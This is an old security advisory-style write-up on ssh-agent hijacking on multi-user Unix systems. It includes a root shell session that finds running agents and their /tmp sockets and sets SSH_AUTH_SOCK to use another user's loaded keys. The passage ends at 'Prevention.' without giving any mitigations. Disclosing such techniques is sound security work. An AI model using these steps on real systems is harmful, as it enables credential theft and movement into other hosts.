ssh-agent hi-jacking. 10/3/96 With ssh being adopted more everyday as the secure way of opening a remote shellon a unix host we are opening up new vulnerabilities. A common solution to remote authentication is ssh-keys, where a user starts an agent and loads their key for later use. These agents left unattended on multiuser systems can be gateways to other hosts. This can also be exabberated(sp?) by multi-user systems that make use of shared user space, such as nfs exported home directories. This document will attempt to outline exposures and methods of attack. I will also suggest solutions as well. What is ssh? From the man page: " ssh (SSH client) is a program for logging into a remote machine and for executing commands on a remote machine. It is intended to replace rlogin and rsh, and provide secure encrypted communications between two untrusted hosts over an insecure network." ssh's more popular use. With companies becoming more security concious in the digital age, and a move towards eliminating clear text transmissions ssh has become more prevailent as a secure remote adminstration solution. Gone are the days of telnet (except for OTP) and rsh, rlogin ssh has become the standard replacement of these protocols. ssh key authentication. One of the many features of ssh is its ability to authenticate using digital keys. This ability has added another layer of security to the normal password based authentication scheme. Now a user must have a pubblic key installed on the remote server and posses the private key as well. That private key usually is encrypted and requires a pass phrase for use. Even if the private key is captured the attacker must posses the passphrase to unlock the key. ssh-agent useage. ssh-agents is a daemon that stores the private keys used for public key authentication. The inent is that the ssh-agent is started during the begining of a session and all subsquent clients can be authenticated via the agent. Dangers of ssh-agent. Most ssh-agent users tend to leave the client running, for hours or days when the system is inactive. This is dangerous because if the system is compromised or the account is taken over, these agents can be roadways into other systems. Example of agent hi-jacking. 1) standard attack seniaro, box is compromised attacker looks for active agents. use known_hosts in gathering possible targets. This would be a simple matter of looking at the process list, getting a list of running agent pids, looking in /tmp for authentication sockets. [r00t@pangea lwc]# ps -ef |grep agent lwc 9099 1 0 18:00 ? 00:00:00 ssh-agent -s [r00t@pangea lwc]# ls -ld /tmp/ssh* drwx------ 2 lwc lwc 4096 Jun 16 18:00 /tmp/ssh-XXP0tLAD [r00t@pangea lwc]# ls -l /tmp/ssh* total 0 srwxrwxr-x 1 lwc lwc 0 Jun 16 18:00 agent.9098 Set ssh-agent environment variables. [root@pangea lwc]# su - lwc [lwc@pangea lwc]$ export SSH_AUTH_SOCK=/tmp/ssh-XXP0tLAD/agent.9098 [lwc@pangea lwc]$ export SSH_AGENT_PID=9099 [lwc@pangea lwc]$ ssh-add -l 1024 14:84:03:8d:03:50:f9:81:c4:5e:53:84:84:c3:f2:5a lwc@pangea.internal (RSA1) (2) /home is shared via nfs. Prevention.